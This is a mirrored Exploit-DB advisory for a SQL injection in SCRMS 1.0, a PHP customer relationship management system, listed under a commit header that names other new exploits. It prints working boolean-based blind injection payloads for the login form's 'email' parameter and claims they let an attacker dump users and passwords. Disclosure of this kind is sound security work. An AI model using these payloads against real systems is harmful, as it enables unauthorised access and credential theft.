bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51491.txt
Exploit-DB cb5c64da21 DB: 2023-06-01 
13 changes to exploits/shellcodes/ghdb

Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Pydio Cells 4.1.2 - Server-Side Request Forgery
Pydio Cells 4.1.2 - Unauthorised Role Assignments

Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)

MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)

Faculty Evaluation System 1.0 - Unauthenticated File Upload

Online Security Guards Hiring System 1.0 - Reflected XSS

Online shopping system advanced 1.0 - Multiple Vulnerabilities

Rukovoditel 3.3.1 - CSV injection

SCRMS 2023-05-27 1.0 - Multiple SQL Injection

Service Provider Management System v1.0 - SQL Injection

Ulicms-2023.1-sniffing-vicuna - Privilege escalation

unilogies/bumsys v1.0.3 beta - Unrestricted File Upload
2023-06-01 00:16:25 +00:00

50 lines
No EOL
1.7 KiB
Text
Raw Blame History

## Exploit Title: SCRMS 2023-05-27 1.0 - Multiple SQLi
## Author: nu11secur1ty
## Date: 05.27.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The `email` parameter appears to be vulnerable to SQL injection
attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or
5206=5213-- were each submitted in the email parameter. These two
requests resulted in different responses, indicating that the input is
being incorporated into a SQL query in an unsafe way. The attacker can
easily steal all users and their passwords for access to the system.
Even if they are strongly encrypted this will get some time, but this
is not a problem for an attacker to decrypt if, if they are not enough
strongly encrypted.
STATUS: HIGH Vulnerability
[+]Payload:
```mysql
---
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/scrms-2023-05-27-10-multiple-sqli.html)
## Time spend:
01:00:00
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
Reference in a new issue View git blame Copy permalink